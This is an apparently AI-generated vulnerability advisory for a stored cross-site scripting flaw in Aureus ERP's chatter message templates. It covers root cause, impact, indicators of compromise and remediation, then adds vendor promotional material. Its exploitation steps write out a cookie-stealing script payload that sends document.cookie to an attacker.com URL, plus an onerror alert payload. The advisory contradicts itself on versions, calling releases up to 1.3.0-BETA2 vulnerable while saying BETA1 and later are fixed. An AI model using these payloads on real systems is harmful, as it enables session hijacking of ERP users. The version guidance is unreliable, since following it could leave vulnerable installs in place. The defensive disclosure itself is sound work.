CVE-2026-4175: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-4175 is a stored Cross-Site Scripting (XSS) vulnerability in Aureus ERP affecting versions up to and including 1.3.0-BETA2. The flaw resides in the Chatter Message Handler component, specifically in the file plugins/webkul/chatter/resources/views/filament/infolists/components/messages/content-text-entry.blade.php, where the subject and body arguments are rendered without sanitization. It was disclosed on March 16, 2026, and carries a CVSS v3.1 base score of 3.5 (Low) and a CVSS v4.0 base score of 5.1 (Medium) (Feedly, ENISA EUVD).

Technical details

The root cause is improper neutralization of user-supplied input during web page generation (CWE-79), with an additional classification of CWE-94 (Improper Control of Code Generation). The vulnerable Blade templates used Laravel's unescaped output directive {!! ... !!} to render user-controlled subject and body fields from chatter messages directly into HTML without sanitization, allowing injection of arbitrary JavaScript. The fix, applied in commit 2135ee7efff4090e70050b63015ab5e268760ec8, replaced raw output with str(...)->sanitizeHtml() across nine affected template files including chatter messages, mail templates, blog posts, and website pages. Exploitation requires the attacker to be authenticated (low privileges) and a victim user to view the malicious message (GitHub PR #939, GitHub Commit).

Impact

Successful exploitation allows an authenticated attacker to inject and execute arbitrary JavaScript in the browsers of other users who view the crafted chatter message. The primary impact is on integrity (low), with no direct confidentiality or availability impact per the CVSS scoring. In practice, XSS payloads could be used to steal session cookies, perform actions on behalf of victims, redirect users to phishing pages, or escalate privileges within the ERP application if higher-privileged users view the malicious content (Feedly).

Exploitability

No public exploit code or active in-the-wild exploitation has been reported for this vulnerability. The EPSS score is approximately 0.034%, indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires a low-privileged authenticated account and passive user interaction (a victim must view the malicious message), limiting its practical attack surface (Feedly, ENISA EUVD).

Exploitation steps

  1. Authenticate: Log in to the Aureus ERP instance with any low-privileged user account on a version up to 1.3.0-BETA2.
  2. Compose a malicious chatter message: Navigate to any record that supports the Chatter feature (e.g., a sales order, invoice, or contact) and compose a new message.
  3. Inject XSS payload: In the subject or body field of the chatter message, insert a JavaScript payload such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script> or an image-based payload like <img src=x onerror=alert(document.cookie)>.
  4. Submit the message: Send the message; it is stored in the database without sanitization on vulnerable versions.
  5. Trigger execution: When a target user (e.g., an administrator or another employee) views the record containing the malicious chatter message, the injected script executes in their browser, potentially exfiltrating session tokens or performing actions under their identity (GitHub PR #939, GitHub Commit).

Indicators of compromise

  • Logs: Web server access logs showing POST requests to chatter message endpoints containing HTML/JavaScript tags (e.g., <script>, onerror=, javascript:) in request bodies.
  • Database: Chatter message records in the database where the subject or body fields contain raw HTML script tags or event handler attributes.
  • Network: Outbound HTTP requests from victim browsers to unexpected external domains shortly after viewing ERP records, potentially carrying cookie or session data as query parameters.
  • Browser: Unexpected JavaScript alerts, redirects, or network requests originating from the Aureus ERP application domain in browser developer tools.

Mitigation and workarounds

The vulnerability is fixed in Aureus ERP version 1.3.0-BETA1 (and later), via commit 2135ee7efff4090e70050b63015ab5e268760ec8 merged on January 12, 2026. Users should upgrade to v1.3.0-BETA1 or any later release immediately. The fix applies Laravel's sanitizeHtml() method to all affected template output points across chatter, mail, blog, and website components. No configuration-based workaround is available; upgrading is the only remediation (GitHub Release v1.3.0-BETA1, GitHub Commit).

Community reactions

The vulnerability received routine automated coverage from vulnerability tracking services including VulDB, ENISA EUVD, and CVE.org upon disclosure in March 2026. A brief mention appeared on Bluesky via the CVE tracking account. No notable security researcher commentary, vendor statements beyond the patch, or significant media coverage has been identified for this low-to-medium severity issue (VulDB, ENISA EUVD).

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management